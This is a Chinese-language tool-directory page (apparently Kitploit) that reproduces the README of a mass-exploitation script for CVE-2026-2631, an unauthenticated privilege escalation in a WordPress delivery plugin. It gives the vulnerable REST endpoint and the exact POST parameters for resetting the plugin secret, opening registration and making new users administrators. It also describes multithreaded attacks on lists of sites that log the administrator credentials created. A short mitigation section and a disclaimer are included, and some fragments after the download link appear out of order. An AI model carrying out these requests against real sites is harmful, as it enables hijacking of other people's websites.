Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-2631 — Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - 未认证权限提升 | Kitploit
工具/GitHubGitHub/nxploited/cve-2026-2631
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubnxploited/cve-2026-2631

CVE-2026-2631

Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - 未认证权限提升

查看仓库
35个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-2631

Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - 未认证权限提升

💥 CVE-2026-2631 – Datalogics Ecommerce Delivery (WordPress) – 未认证权限提升

PoC / 漏洞利用脚本: CVE-2026-2631.py
作者: Khaled Alenazi (Nxploited) – Nxploited ZeroDay Hub
联系方式: Telegram:@Kxploit


🧬 漏洞概述

  • 插件: Datalogics Ecommerce Delivery – Datalogics (WordPress)
  • 受影响版本: < 2.6.60(不含)
  • 漏洞类型: 未认证权限提升
  • CVE: CVE-2026-2631
  • CVSS v3.1: 9.8 (Critical)
    AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 公开发布日期: 2026 年 3 月 12 日
  • 最后更新: 2026 年 3 月 19 日
  • 研究人员: Khaled Alenazi (Nxploited)

Datalogics Ecommerce Delivery – Datalogics 插件暴露了一个未认证端点:

root@kitploit:~
/wp-json/gsf/v1/update-options

该脚本利用此端点执行以下操作:

  1. 💣 通过易受攻击的 resetStoreConfigrations 操作重置内部 shop_secret 密钥。
  2. 🔓 启用用户注册:users_can_register = 1。
  3. 👑 将默认新用户角色设置为 administrator:default_role = administrator。
  4. 🧑‍💻 通过 WordPress 注册表单自动注册新用户:
    • wp-login.php?action=register

如果成功,任何通过注册表单创建的新用户都将成为管理员。


⚙️ 功能特性

  • ✅ 批量利用,可针对文件中的多个 WordPress 目标。
  • ✅ 未认证(无需登录/Cookie)。
  • ✅ 通过易受攻击的 REST 端点自动重置 shop_secret。
  • ✅ 自动更新 WordPress 选项:
    • users_can_register = 1
    • default_role = administrator
  • ✅ 使用自定义凭据自动注册账户。
  • ✅ 使用 rich 提供丰富的 TUI 输出(彩色且实时更新的表格)。
  • ✅ 多线程,线程数可调。
  • ✅ 将结果记录到 Login_admin.txt。

📦 环境要求

🐍 运行时

  • Python 3.x(建议 3.8+)

📚 Python 包

安装所需包:

root@kitploit:~
pip install -r requirements.txt

示例 requirements.txt:

root@kitploit:~
requests
rich
urllib3

或手动安装:

root@kitploit:~
pip install requests rich urllib3

🧪 脚本逻辑(高级流程)

针对每个目标:

  1. 规范化 URL

    • 确保缺失时自动添加 http:// 前缀。
    • 去除末尾斜杠。
  2. 重置 shop_secret

    • 端点:
      /wp-json/gsf/v1/update-options
    • POST 数据:
      • action = resetStoreConfigrations
      • shop_secret = <new_secret>
    • 在响应文本中查找:
      • app secret key has been updated successfully
  3. 更新 WordPress 选项

    • 同一端点,附带:
      • action = createUpdateOption
    • 两次选项更新:
      1. option_key = users_can_register、option_value = 1
      2. option_key = default_role、option_value = administrator

🧵 多线程模型

  • 从 list.txt(或自定义文件)读取所有目标。
  • 使用 chunkify 将目标拆分为 N 个块。
  • 启动 N 个工作线程,每个线程处理自己的目标列表。
  • 使用共享的 Queue 向打印线程传递状态消息。
  • 专用打印线程(printer_loop)更新实时 rich 表格:
    • 显示索引、站点、状态(SUCCESS/FAILED/ERROR)和详情。
    • 显示已处理总数和输出文件名。

🚀 使用方法

1️⃣ 基本运行

root@kitploit:~
python3 CVE-2026-2631.py

系统将交互式提示您输入:

  1. 目标文件

    • 提示:Targets file (one host/URL per line) [list.txt]:
    • 默认值:list.txt
    • 每行:域名或完整 URL
      • 示例:
        • victim.com
        • https://target-site.com
        • http://example.org/blog
  2. 线程数

    • 提示:Threads (1-50) [10]:
    • 默认值:10
    • 最大值:50
      线程越多速度越快,但会给您的系统和目标带来更高负载。
  3. shop_secret 值

    • 提示:shop_secret [Nxploited_newSecret]:
    • 默认值:Nxploited_newSecret
      这是发送到 resetStoreConfigrations 的新密钥。

这些凭据将用于对每个易受攻击目标的注册尝试。


2️⃣ 目标文件格式

创建 list.txt(或任何您想要的文件),每行一个目标:

root@kitploit:~
example1.com
http://example2.com
https://shop.example3.net
blog.target-site.org

脚本将:

  • 如果缺失,自动添加 http:// 前缀。
  • 去除末尾 /。

3️⃣ 输出与结果

  • 所有成功的操作(即使注册失败但选项已设置)都会写入:

    Login_admin.txt

  • 典型行:

    root@kitploit:~
    http://example1.com | register_url: http://example1.com/wp-login.php?action=register | shop_secret: Nxploited_newSecret | reset_ok,option_ok,option_ok,register_open,registered user=Nx_test1 [email protected] pass=Nx_adminSA
    
  • 实时表格中的状态示例:

    • ✅ SUCCESS – 选项已设置和/或用户已注册。
    • ❌ FAILED – 重置/选项失败,漏洞不可利用。
    • ⚠️ ERROR – 异常、网络错误、超时等。

🧱 HTTP 端点与参数

🔓 易受攻击的 REST 端点

root@kitploit:~
POST /wp-json/gsf/v1/update-options

1. 重置 shop_secret

root@kitploit:~
action=resetStoreConfigrations
shop_secret=<new_secret>

2. 更新选项

root@kitploit:~
action=createUpdateOption
shop_secret=<new_secret>
option_key=users_can_register
option_value=1
root@kitploit:~
action=createUpdateOption
shop_secret=<new_secret>
option_key=default_role
option_value=administrator

🧑‍💻 注册端点

root@kitploit:~
GET/POST /wp-login.php?action=register

脚本会:

  • 如果存在,提取 _wpnonce。
  • 使用提供的用户名、邮箱和密码(如果字段存在)发送注册数据。

🔧 脚本内部结构(关键函数)

  • normalize_site(raw: str) -> str
    规范化目标 URL。

  • send_reset_secret(site: str, secret: str, timeout: int = 10) -> (bool, str)
    尝试 resetStoreConfigrations 操作。

  • send_option(site: str, secret: str, key: str, value: str, timeout: int = 10) -> (bool, str)
    通过易受攻击的端点设置 WordPress 选项。

  • check_registration_open(site: str, timeout: int = 10) -> (bool, str)
    检查注册是否开放且表单是否可访问。

  • try_register_user(...) -> (bool, str)
    尝试注册提供的用户。

  • write_success_line(site: str, secret: str, detail: str)
    将成功详情记录到 Login_admin.txt。

  • worker(...)
    每线程工作器,执行:

    1. 重置 shop_secret

🧪 示例运行(交互式)

root@kitploit:~
$ python3 CVE-2026-2631.py

[Banner / ASCII Art]

Targets file (one host/URL per line) [list.txt]:
> list.txt

Threads (1-50) [10]:
> 20

shop_secret [Nxploited_newSecret]:
> NxSecret2026!

Registration username [Nx_test1]:
> admin_nx

Registration email [[email protected]]:
> [email protected]

Registration password [Nx_adminSA]:
> SuperStrongP@ss!

[Live table starts showing each target’s status]
Processed 5/20 targets · Output: Login_admin.txt

Done. Successful sites (if any) saved to Login_admin.txt.

🛡️ 缓解措施与建议

致防御者/站点所有者:

  • 🔁 立即将插件更新至 2.6.60 或更高版本。
  • 🧹 检查:
    • WordPress 用户列表中是否有未知管理员。
    • wp_users 中最近的注册记录。
  • 🔑 重新生成插件使用的任何密钥。
  • 📜 检查访问日志中是否有以下路径的访问:
    • /wp-json/gsf/v1/update-options
    • /wp-login.php?action=register
  • 🧱 考虑使用 WAF 规则阻止对敏感 REST 端点的未授权访问。

⚠️ 法律免责声明

本脚本仅严格用于教育和经授权的安全测试目的。

  • 未经所有者明确书面许可,禁止在任何系统、应用程序或网络上使用本工具。
  • 未经授权访问、利用或滥用漏洞是违法行为,可能导致刑事指控。
  • 本脚本的作者(Khaled Alenazi – Nxploited)、贡献者和分发者:
    • ❌ 不对以下情况承担任何责任或义务:
      • 滥用此代码
      • 直接或间接造成的损害
      • 因使用本工具而产生的任何法律后果
  • 使用本脚本即表示您同意:
    • 您对自己的行为负全部责任。
    • 您将遵守所有适用的当地、国家和国际法律法规。
    • 您将仅在受控环境中和/或在适当授权(渗透测试/红队、漏洞赏金、实验室等)下使用本工具。

如果您不同意这些条款,请勿使用本脚本。


❤️ 致谢

  • 研究与漏洞利用:
    • Khaled Alenazi (Nxploited) – Nxploited ZeroDay Hub
  • CVE: CVE-2026-2631
  • 联系方式: Telegram @Kxploit

注意安全,负责任地开展测试。🕶️💻

下载工具
  • 成功特征:
    • wordpress option has been created or updated successfully
  • 检查注册是否开放

    • URL:
      /wp-login.php?action=register
    • 在 HTML 中检查:
      • Users can register、Anyone can register、user_registration、registerform
    • 或检测明确的:
      • user registration is currently not allowed
  • 尝试用户注册

    • 使用相同的注册 URL。
    • 如果存在,从隐藏输入中提取 _wpnonce。
    • 发送注册 POST:
      • user_login、user_email
      • 如果存在密码字段,则发送 user_pass/user_pass2
      • _wpnonce、_wp_http_referer、redirect_to、wp-submit=Register
    • 通过以下特征检测成功:
      • registration complete、check your email、user registered
    • 如果用户名已存在:
      • 标记为成功:user_already_exists
  • 日志记录

    • 每次成功的选项更新(无论注册是否成功)都会写入一行到:
      • Login_admin.txt
    • 格式:
      root@kitploit:~
      <site> | register_url: <url> | shop_secret: <secret> | <details>
      
  • 注册凭据

    • Registration username [Nx_test1]:
    • Registration email [[email protected]]:
    • Registration password [Nx_adminSA]:
  • 设置选项
  • 检查注册
  • 尝试注册
  • 记录结果并将状态推送到队列
  • printer_loop(queue: Queue, total: int)
    从队列读取消息并更新 rich 实时表格界面。

  • main()
    统筹协调:

    • 横幅
    • 用户提示
    • 目标加载
    • 线程生成
    • 汇合及最终消息。